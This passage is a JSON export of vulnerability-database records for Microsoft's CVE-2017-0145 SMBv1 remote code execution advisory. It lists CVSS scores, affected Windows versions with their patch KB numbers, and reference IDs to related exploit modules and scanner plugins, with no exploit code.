"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:51:23", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-29T10:45:17", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB4014077", "KB3210720", "KB3212646", "KB4012215", "KB4012216", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012217", "KB4013198", "KB3177186", "KB4012212", "KB3205409", "KB4012598", "KB3205401", "KB3213986", "KB4012213", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:45:17", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-30T06:48:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3213986", "KB4012606", "KB4013429", "KB4012598", "KB3177186", "KBMS16-110, 3187754", "KB4012212", "KB4013198", "KB3205409", "KB4012216", "KB3212646", "KB4012215", "KB4012217", "KB3205401", "KB4012214", "KB3210721", "KB3210720", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:48:04", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": 